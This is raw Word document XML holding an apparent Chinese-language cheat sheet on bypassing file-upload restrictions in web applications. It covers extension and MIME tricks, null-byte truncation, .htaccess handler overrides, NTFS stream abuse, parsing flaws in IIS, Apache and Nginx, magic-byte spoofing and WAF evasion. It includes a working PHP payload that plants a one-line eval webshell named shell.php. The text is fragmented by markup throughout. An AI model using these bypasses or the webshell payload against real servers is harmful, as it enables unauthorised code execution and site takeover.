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 客户端JS检测</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 w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>B 服务端MIME类型检测</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Content-Type: image/gif jpeg (原为Content-Type: text/plain)</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.jpg image/jpeg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.ppt application/x-ppt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 w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>C 目录路径检测</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文件名截断</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空格</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0x00 改burp包成00</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%00</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xx.jpg%00.php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换行符以及回车符的截断</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把文件名放到目录路径那边去</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把文件名前加上目录 filename="test.asp/evil.jpg"</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都可以配合截断</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
        </w:rPr>
        <w:t>D 文件扩展名</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 文件名大小写绕过</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用像AsP，pHp 之类的文件名绕过黑名单检测</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2. 名单列表绕过</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用黑名单里没有的名单进行攻击，比如黑名单里没有asa 或cer 之类</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3. 特殊文件名绕过</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比如发送的http 包里把文件名改成test.asp. 或test.asp_</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4. 0x00 截断绕过</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5.上传一个 .htaccess 文件，文件内容如下</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 xml:space="preserve">　　　　　　&lt;FilesMatch "anything"&gt; </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 xml:space="preserve">　　　　　　SetHandler application/x-httpd-php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 xml:space="preserve">　　　　　　&lt;/FilesMatch&gt;</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再次上传一个 xxxx.anything 就可以了</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2.3.2 windows特性</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ADS流：test.php::$DATA</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假设我们需要上传的文件内容为：&lt;?php phpinfo();?&gt;下面是上传是会出现的现象：</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上传的文件名  服务器表面现象    生成的文件内容</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Test.php:a.jpg     生成Test.php  空</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lastRenderedPageBreak/>
        <w:t>Test.php::$DATA  生成test.php  &lt;?php phpinfo();?&gt;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Test.php::$INDEX_ALLOCATION  生成test.php文件夹  </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Test.php::$DATA\0.jpg  生成0.jpg  &lt;?php phpinfo();?&gt;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Test.php::$DATA\aaa.jpg  生成aaa.jpg  &lt;?php phpinfo();?&gt;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test.php_</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test.php(空格)</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&lt;=*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&gt;=?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test.&lt;&lt;&lt;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test.php:1.jpg会生成一个test.php的空文件</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2.3.3 ASP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解析漏洞:</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.asp;.jpg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.asp.jpg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.asp;jpg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+111.asp;+222.jpg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/111.asp/1.jpg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/111.aspx/1.jpg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后缀名：</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asa,cer,cdx,ashx,asmx,xml,htr,asax</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双文件扩展：</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test.asp.jpg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RTLO：</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asp.html-内容为一句话</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php.txt-内容为一句话</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2.3.4 JSP</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.jsp.jpg.jsp-用两个jsp包围中间的jpg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后缀名：jspf,jspa,jsps</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2.3.5 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后缀名：.php3 ,.php5,.php7</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大小写：pHp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解析漏洞：</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1.php.jpg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1.jpg.php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1.php jpg(jpg前面两个空格)</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1.php jpg(jpg前面一个空格)</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/1.jpg/1.php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/1.jpg%00.php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lastRenderedPageBreak/>
        <w:t>/1.jpg/.php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/1.jpg/php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特殊文件利用：</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.htaccess</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.user.ini</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E 文件内容</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要绕过jpg 文件幻数检测就要在文件开头写上下图的值</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Value = FF D8 FF E0 00 10 4A 46 49 46</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要绕过gif 文件幻数检测就要在文件开头写上下图的值</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Value = 47 49 46 38 39 61</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要绕过png 文件幻数检测就要在文件开头写上下面的值</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Value = 89 50 4E 47</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 文件相关信息检测</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图像文件相关信息检测常用的就是getimagesize()函数</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只需要把文件头部分伪造好就ok 了，就是在幻数的基础上还加了一些文件信息</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有点像下面的结构</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GIF89a</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(...some binary data for image...)</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&lt;?php phpinfo(); ?&gt;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 skipping the rest of binary data ...)</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先说下对渲染/加载测试攻击- 代码注入绕过</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可以用图像处理软件对一张图片进行代码注入</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用winhex 看数据可以分析出这类工具的原理是</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在不破坏文件本身的渲染情况下找一个空白区进行填充代码</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然后是进行fuzzing 触发报错看下是被用什么API 或函数进行的二次渲染</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上传文件数据不完整的gif 文件</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触发报错后，知道后台用的是imagecreatefromgif()这个函数</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上传文件数据不完整的png 文件</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触发报错后，知道后台用的是imagecreatefrompng()这个函数</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二次渲染 绕过</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利用GIF文件绕过二次渲染</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绕过GD库</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溢出攻击，上传自己的恶意文件后 ，服务器上的文件加载器会主动进行加载测试 加载测试 时被溢出攻击执行shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00666C66">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="003884"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://lcx.cc/?FoxNews=1542.html</w:t>
        </w:r>
      </w:hyperlink>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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对比两张经过php-gd库转换过的gif图片，如果其中存在相同之处，这就证明这部分图片数据不会经过转换。然后我可以注入代码到这部分图片文件中，最终实现远程代码执行</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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.1 利用waf特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在恶意代码前加垃圾数据；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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在数据包前加垃圾数据；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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在Content-Disposition参数后面加垃圾数据；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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多加一个filename；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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更改HTTP请求方法；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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删除实体里面的Conten-Type字段；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一种是删除Content整行，第二种是删除C后面的字符。删除掉ontent-Type: image/jpeg只留下c，将.php加c后面即可，但是要注意额，双引号要跟着c.php。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除Content-Disposition字段里的空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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增加一个空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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修改Content-Disposition字段值的大小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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文件名后缀处回车</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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多个Content-Disposition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.4 特殊的长文件名绕过</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文件名使用非字母数字，比如中文等最大程度的拉长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell.asp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王王</w:t>
      </w:r>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.jpg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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.5 反删除</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将</w:t>
      </w:r>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name="file1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>改成了file4，可以防止文件删除（JCMS漏洞）</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解析漏洞</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 xml:space="preserve">IIS </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解析- test.asp/任意文件名| test.asp;任意文件名| 任意文件名/任意文件名.php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描述- IIS6.0 在解析asp 格式的时候有两个解析漏洞，一个是如果目录名包含".asp"字符串，</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那么这个目录下所有的文件都会按照asp 去解析，另一个是只要文件名中含有".asp;"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lastRenderedPageBreak/>
        <w:t>会优先按asp 来解析</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IIS7.0/7.5 是对php 解析时有一个类似于Nginx 的解析漏洞，对任意文件名只要在URL</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后面追加上字符串"/任意文件名.php"就会按照php 的方式去解析(IIS6.0 没测试)</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Apache:</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从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断</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后缀不识别：1.php.php123</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配置错误：1.php.jpg</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Nginx：</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Nginx默认是以CGI的方式支持PHP解析的，和IIS7.5一样开启了cgi.fix_pathinf</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1.jpg/1.php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1.jpg%00.php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1.jpg/%20\1.php</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上传一个名字为test.jpg，以下内容的文件</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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&lt;?PHP fputs(fopen('shell.php','w'),'&lt;?php eval($_POST[caidao])?&gt;');?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php</w:t>
      </w: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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CMS漏洞：针对不同CMS存在的上传漏洞进行绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00666C66" w:rsidRPr="00666C66" w:rsidRDefault="00666C66" w:rsidP="00666C66">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C66">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编辑器漏洞：比如FCK，Ewebeditor等，可以针对编辑器的漏洞进行绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37070" w:rsidRDefault="00A37070"/>
    <w:sectPr w:rsidR="00A37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F2B09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ED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621BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1C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D2408"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3A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7EE"/>
    <w:rsid w:val="003467EE"/>
    <w:rsid w:val="00666C66"/>
    <w:rsid w:val="00A3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66C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66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110103">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="211305697">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2142768187">
          <w:marLeft w:val="420"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="669909424">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1954971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cx.cc/?FoxNews=154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cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-06T10:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-06T10:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>